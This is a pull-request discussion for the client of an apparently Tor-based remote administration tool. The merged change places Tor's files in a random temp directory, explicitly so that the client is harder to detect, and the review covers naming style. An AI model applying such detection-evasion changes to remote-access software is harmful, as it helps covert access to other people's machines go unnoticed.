### PR TITLE
Obfuscate the location of Tor files in temp dir

### PR DESCRIPTION
**Pull request by JustinTimperio**
This is a pretty straightforward fix for #206. This hides the Tor directory in the OS's temp area making it harder to detect hopefully

### CODE REVIEW

File: torat_client/netclient.go [hunk 1]
```diff
@@ -36,7 +37,18 @@ func NetClient() {
...
 	var conf tor.StartConf
-	conf = tor.StartConf{ProcessCreator: embedded.NewCreator()}
+
+	tmp_dir, err := ioutil.TempDir("", "")
+	if err != nil {
+		log.Println("[NetClient] [!] Could not create temp dir for Tor: ", err)
+		return
+	}
+
+	conf = tor.StartConf{
```
Comment (lu4p) [inline torat_client/netclient.go:47]: This can be `conf := ....` then the var decl above can be removed

File: torat_client/netclient.go [hunk 2]
```diff
@@ -36,7 +37,18 @@ func NetClient() {
 	log.Println("NetClient")
 	initServer()
 	var conf tor.StartConf
-	conf = tor.StartConf{ProcessCreator: embedded.NewCreator()}
+
+	tmp_dir, err := ioutil.TempDir("", "")
```
Comment (lu4p) [inline torat_client/netclient.go:41]: please use camel case

Comment (JustinTimperio) [reply torat_client/netclient.go:41]: Sorry it's a force of habit Unix thing

File: torat_client/netclient.go (hunk 1 above)
Comment (JustinTimperio) [reply torat_client/netclient.go:47]: okay, I can change this but just so you know thats how you wrote it originally. 

I totally agree though, `:=` is better than `var` and `=`

File: torat_client/netclient.go (hunk 2 above)
Comment (JustinTimperio) [reply torat_client/netclient.go:41]: I see some more non camel cases I'm gonna fix

**Comment by JustinTimperio** [comment]
K all patched up

File: torat_client/netclient.go [hunk 3]
```diff
@@ -35,8 +36,18 @@ func connect(dialer *tor.Dialer) (net.Conn, error) {
 func NetClient() {
 	log.Println("NetClient")
 	initServer()
-	var conf tor.StartConf
-	conf = tor.StartConf{ProcessCreator: embedded.NewCreator()}
+
+	tmp_dir, err := ioutil.TempDir("", "")
```
Comment (lu4p) [inline torat_client/netclient.go:40]: You missed a name

Comment (JustinTimperio) [reply torat_client/netclient.go:40]: shit......... my bad

**Review by lu4p — APPROVED** [review]

**Pull request merged**